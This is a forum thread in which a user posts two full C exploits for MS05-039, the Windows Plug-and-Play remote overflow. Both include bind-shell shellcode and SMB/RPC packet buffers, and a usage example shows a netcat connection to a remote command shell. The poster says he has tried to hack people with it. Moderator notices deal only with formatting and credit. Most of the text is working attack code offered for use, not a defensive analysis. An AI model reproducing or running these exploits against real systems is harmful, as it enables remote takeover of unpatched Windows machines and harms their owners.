st4r-s4t

Microsoft Windows Plug-and-play Service Remote Ove


This is the C code; you can compile it with lcc-win32, gcc, or Visual C++.

/*Windows 2000 universal exploit for MS05-039-\x6d\x35\x6c\x30\x6e\x6e\x79-*/#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winnetwk.h>#include <winsock.h>#include <Rpc.h>#include <wchar.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib, "mpr")#pragma comment(lib, "Rpcrt4")BYTE Data1[0x68] ={0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00, 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00, 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00, 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00, 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};struct DataStruct1{       BYTE SomeString[0x30];       DWORD RESDataType;       DWORD LFD;       DWORD SDM1;       DWORD SDO;       DWORD SDL;       DWORD SDM2;       BYTE  SDA[0x07D0];       DWORD LRD;       DWORD MB;       DWORD DM;};struct RPCBIND{       BYTE VerMaj;       BYTE VerMin;       BYTE PacketType;       BYTE PacketFlags;       DWORD DataRep;       WORD FragLength;       WORD AuthLength;       DWORD CallID;       WORD MaxXmitFrag;       WORD MaxRecvFrag;       DWORD AssocGroup;       BYTE NumCtxItems;       WORD ContextID;       WORD NumTransItems;       GUID InterfaceUUID;       WORD InterfaceVerMaj;       WORD InterfaceVerMin;       GUID TransferSyntax;       DWORD SyntaxVer;};//from metasploit, before you were bornBYTE 
BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c""\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32""\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07""\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24""\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8""\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64""\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e""\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53""\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4""\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9""\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d""\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51""\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54""\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff""\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a""\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55""\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c""\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10""\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c""\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49""\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff""\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3""\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55""\x04\x31\xdb\x53\xff\xd0"};BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};struct RPCFUNC{       BYTE VerMaj;       BYTE VerMin;  
     BYTE PacketType;       BYTE PacketFlags;       DWORD DataRep;       WORD FragLength;       WORD AuthLength;       DWORD CallID;       DWORD AllocHint;       WORD ContextID;       WORD Opnum;};BYTE POP[0x27] ={0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00, 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00, 0x05,0x08,0x00,0x00,0x41,0x00,0x41};int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){       BYTE rbuf[0x1000];       DWORD dw;       struct RPCBIND RPCBind;       memcpy(&RPCBind,&PRPC,sizeof(RPCBind));       UuidFromString(Interface,&RPCBind.InterfaceUUID);       UuidToString(&RPCBind.InterfaceUUID,&Interface);       RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);       RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);       TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);       return 0;}int Attack(HANDLE PipeHandle){       struct RPCFUNC RPCOP;       int bwritten=0;       BYTE *LargeBuffer;       BYTE rbuf[0x100];       DWORD dw;       struct DataStruct1 EvilRPC;       memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));       EvilRPC.SDL=0x07C0;       memset(EvilRPC.SDA,0x90,0x07D0);       EvilRPC.SDA[76]=0x3e;       EvilRPC.SDA[77]=0x1e;       EvilRPC.SDA[78]=0x02;       EvilRPC.SDA[79]=0x75;       memset(EvilRPC.SDA+80,0x90,10);       EvilRPC.SDA[90]=0x90;       memcpy(EvilRPC.SDA+94,BindShell,374);       EvilRPC.MB=0x00000004;       EvilRPC.DM=0x00000000;       EvilRPC.LFD=0x000007E0;       EvilRPC.LRD=0x000007E0;       memcpy(&RPCOP,&POP,sizeof(RPCOP));       RPCOP.Opnum = 54;       RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);       RPCOP.AllocHint=sizeof(EvilRPC);       LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));       memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));       memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));       memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));       printf("Sending payload...\nThis has to time 
out... ctrl+c after 5 secs\ncheck for shell on port 8721");       TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);       free(LargeBuffer);       return 0;}int main(int argc, char* argv[]){       char *server;       NETRESOURCE nr;       char unc[MAX_PATH];       char szPipe[MAX_PATH];       HANDLE hFile;       if (argc < 2)       {               printf("Usage: %s <host>\n", argv[0]);               return 1;       }       server=argv[1];       _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);       unc[sizeof(unc)-1] = 0;       nr.dwType       = RESOURCETYPE_ANY;       nr.lpLocalName  = NULL;       nr.lpRemoteName = unc;       nr.lpProvider   = NULL;       WNetAddConnection2(&nr, "", "", 0);       _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);       hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);       BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");       //SendMalformed RPC request       Attack(hFile);       return 0;}

Notice from snlildude87:
Credits adjusted. Remember to preview posts before posting to avoid something like this in the future.
Notice from cmatcmextra:
[-codebox-] tags used instead. Should shorten the page size up ... a bit -_-


Errr... really, what do you mean with this topic? Please explain better; I can only see a bunch of OS code, and the subject talks about "Microsoft Windows Plug-and-play Service Remote Ove".


Oh, OK, I am sorry. This is the new Plug and Play vulnerability; its name is:

MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)

* Description:

*    A remote code execution and local elevation of privilege

*    vulnerability exists in Plug and Play that could allow an

*    attacker who successfully exploited this vulnerability to take

*    complete control of the affected system.

*

*    This is a remote code execution and local privilege elevation

*    vulnerability. On Windows 2000, an anonymous attacker could

*    remotely try to exploit this vulnerability.

*

*    On Windows XP Service Pack 1, only an authenticated user could

*    remotely try to exploit this vulnerability.

*    On Windows XP Service Pack 2 and Windows Server 2003, only an

*    administrator can remotely access the affected component.

*    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,

*    this is strictly a local privilege elevation vulnerability.

*    An anonymous user cannot remotely attempt to exploit this

*    vulnerability on Windows XP Service Pack 2 and Windows

*    Server 2003.

This is the other Plug and Play vulnerability exploit... I compiled it with lcc-win32 and it attacks port 445/tcp, but so far I haven't been able to hack anyone with it:

other vuln of plug and play:

/* #define _WIN32 */#include <stdio.h>#include <stdlib.h>#include <string.h>#ifdef _WIN32#include <winsock2.h>#pragma comment(lib, "ws2_32")#else#include <sys/types.h>#include <netinet/in.h>#include <sys/socket.h>#include <netdb.h>#endifunsigned char SMB_Negotiate[] =	"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"	"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"	"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"	"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"	"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"	"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"	"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";unsigned char SMB_SessionSetupAndX[] =	"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"	"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"	"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"	"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"	"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"	"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"	"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"	"\x2E\x00\x30\x00\x00\x00\x00\x00";unsigned char SMB_SessionSetupAndX2[] =	"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"	"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"	"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"	
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"	"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"	"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"	"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"	"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"	"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"	"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"	"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"	"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";unsigned char SMB_TreeConnectAndX[] =	"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"	"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";unsigned char SMB_TreeConnectAndX_[] =	"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";/* browser */unsigned char SMB_PipeRequest_browser[] =	"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"	"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"	"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"	"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"	"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";unsigned char SMB_PNPEndpoint[] =/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */	"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"	"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"	"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"	"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"	
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"	"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"	"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";unsigned char RPC_call[] =	"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"	"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"	"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"	"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"	"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"	"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"	"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"	"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"	"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"	/* jmp over - entry point */	"\xEB\x08\x90\x90"	/* pop reg; pop reg; retn; - umpnpmgr.dll */	"\x67\x15\x7a\x76" /* 0x767a1567 */	/* jmp ebx - umpnpmgr.dll	"\x6f\x36\x7a\x76" */	"\xEB\x08\x90\x90\x67\x15\x7a\x76"	"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";unsigned char RPC_call_end[] =	"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";unsigned char bind_shellcode[] =	"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"	"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"	"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"	
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"	"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"	"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"	"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"	"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"	"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"	"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"	"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"	"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"	"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"	"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"	"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"	"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"	"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"	"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"	"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"	"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"	"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"	"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";#define SET_PORTBIND_PORT(buf, port) \	*(unsigned short *)(((buf)+186)) = (port)voidconvert_name(char *out, char *name){	unsigned long len;	len = strlen(name);	out += len * 2 - 1;	while (len--) {  *out-- = '\x00';  *out-- = name[len];	}}intmain (int argc, char **argv){	struct sockaddr_in addr;	struct hostent *he;	int len;	int sockfd;	unsigned short smblen;	unsigned short bindport;	unsigned char tmp[1024];	unsigned char packet[4096];	unsigned char *ptr;	char recvbuf[4096];#ifdef _WIN32	WSADATA wsa;	WSAStartup(MAKEWORD(2,0), &wsa);#endif	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");	printf("\t         Universal Exploit + no crash shellcode\n\n\n");	printf("\t            Copyright © 2005 .: houseofdabus 
:.\n\n\n");	if (argc < 3) {  printf("%s <host> <bind port>\n", argv[0]);  exit(0);	}	if ((he = gethostbyname(argv[1])) == NULL) {  printf("[-] Unable to resolve %s\n", argv[1]);  exit(0);	}	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  printf("[-] socket failed\n");  exit(0);	}	addr.sin_family = AF_INET;	addr.sin_port = htons(445);	addr.sin_addr = *((struct in_addr *)he->h_addr);	memset(&(addr.sin_zero), '\0', 8);	printf("\n[*] connecting to %s:445...", argv[1]);	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {  printf("\n[-] connect failed\n");  exit(0);	}	printf("ok\n");	printf("[*] null session...");	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if (len <= 10) {  printf("\n[-] failed\n");  exit(0);	}	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	ptr = packet;	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);	ptr += sizeof(SMB_TreeConnectAndX)-1;	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);	convert_name(ptr, tmp);	smblen = strlen(tmp)*2;	ptr += smblen;	smblen += 9;	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);	ptr += sizeof(SMB_TreeConnectAndX_)-1;	smblen = ptr-packet;	smblen -= 4;	memcpy(packet+3, &smblen, 1);	if (send(sockfd, packet, ptr-packet, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n"); 
 exit(0);	}	printf("ok\n");	printf("[*] bind pipe...");	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	len = recv(sockfd, recvbuf, 4096, 0);	if ((len <= 10) || (recvbuf[9] != 0)) {  printf("\n[-] failed\n");  exit(0);	}	printf("ok\n");	printf("[*] sending crafted packet...");	// nop	ptr = packet;	memset(packet, '\x90', sizeof(packet));	// header & offsets	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);	ptr += sizeof(RPC_call)-1;	// shellcode	bindport = (unsigned short)atoi(argv[2]);	bindport ^= 0x0437;	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);	// end of packet	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,  RPC_call_end,  sizeof(RPC_call_end)-1);	// sending...	if (send(sockfd, packet, 2196, 0) < 0) {  printf("\n[-] send failed\n");  exit(0);	}	printf("ok\n");	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));	recv(sockfd, recvbuf, 4096, 0);return 0;}

 

and some info about it:

* ---------------------------------------------------------------------

* Solution:

*    http://www.microsoft.com/err/technet/security/

*

* ---------------------------------------------------------------------

* Systems Affected:

*    - Windows Server 2003, SP1

*    - Windows XP SP1, SP2

*    - Windows 2000 SP4

*

* ---------------------------------------------------------------------

* Tested on:

*    - Windows 2000 SP4

*

* ---------------------------------------------------------------------

* Compile:

*

* Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

* Linux      : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

*

* ---------------------------------------------------------------------

* Example:

*

* C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777

*

* [*] connecting to 192.168.0.22:445...ok

* [*] null session...ok

* [*] bind pipe...ok

* [*] sending crafted packet...ok

* [*] check your shell on 192.168.0.1:7777

* Ctrl+C

*

* C:\>nc 192.168.0.1 7777

*

* Microsoft Windows 2000 [Version 5.00.2195]

* © Copyright 1985-2000 Microsoft Corp.

*

* C:\WINNT\system32>

*

* ---------------------------------------------------------------------.

I'm sorry; I'm Iranian and I can't speak English very well!!

 

I HOPE FOR ...

by

 

Notice from BuffaloHELP:
Whenever you copy and paste from another source you must place QUOTE tags. Source http://imp.ovh.net/fr/ Credit adjusted.

Notice from Klass:
User warned, as a verbal warning was given prior. Also, next time you post long code, use
[codebox] [/codebox]
tags.
